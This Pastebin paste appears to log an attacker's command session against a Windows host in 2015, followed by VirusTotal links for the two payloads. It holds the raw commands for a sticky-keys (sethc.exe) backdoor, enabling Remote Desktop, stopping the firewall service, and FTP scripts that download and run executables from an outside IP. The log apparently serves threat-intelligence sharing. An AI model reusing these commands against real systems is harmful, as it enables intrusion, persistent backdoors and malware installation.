Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 2015-10-16 23:33:19 - 42.96.140.141 incoming shellcommand:
- copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- copy "%systemroot%\$NtServicePackUninstall$\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\system32\dllcache\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- copy "%systemroot%\$NtServicePackUninstall$\net1.exe" "%systemroot%\system32\net1.exe"/y
- copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\tvcv.exe"/y
- copy "%systemroot%\ServicePackFiles\i386\ftp.exe" "%systemroot%\system32\ftp.exe"/y
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /f
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /f
- reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /d "%systemroot%\system32\cmd.exe"
- reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_DWORD /d "0" /f
- cacls %systemroot%\system32\ftp.exe /e /p system:f
- cacls %systemroot%\system32\net1.exe /e /p system:f
- cacls %systemroot%\system32\wscript.exe /e /p system:f
- net1 stop sharedaccess
- echo open 42.96.203.188>>assa2an.txt
- echo cesi>>assa2an.txt
- echo cesi>>assa2an.txt
- echo bin>>assa2an.txt
- echo get reb2967.exe>>assa2an.txt-
- echo bye>>assa2an.txt
- ftp -s:assa2an.txt
- reb2967.exe
- reb2967.exe
- del assa2an.txt
- echo open 42.96.203.188 >>sadsad.txt
- echo cesi>>sadsad.txt
- echo cesi>>sadsad.txt
- echo bin>>sadsad.txt
- echo get vip1.exe>>sadsad.txt
- echo bye>>sadsad.txt
- tvcv.exe -s:sadsad.txt
- vip1.exe
- vip1.exe
- del sadsad.txt
- cacls %systemroot%\system32\ftp.exe /e /p
- system:n
- cacls %systemroot%\system32\wscript.exe /e /p system:n
- exit
- exit
- ##########################################################################
- Payloads:
- vip1.exe - https://www.virustotal.com/fr/file/03f4dc0cace57cc3bfdccde268acfe88ba9713afe4edb915cd516fe0d43962c4/analysis/1444397185/
- reb2967.exe - https://www.virustotal.com/fr/file/fa1bdae4ca16f9c22842408a4f711a491a4e0cd11d0c64c8e4bd1b8e08eb8420/analysis/1444397180/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement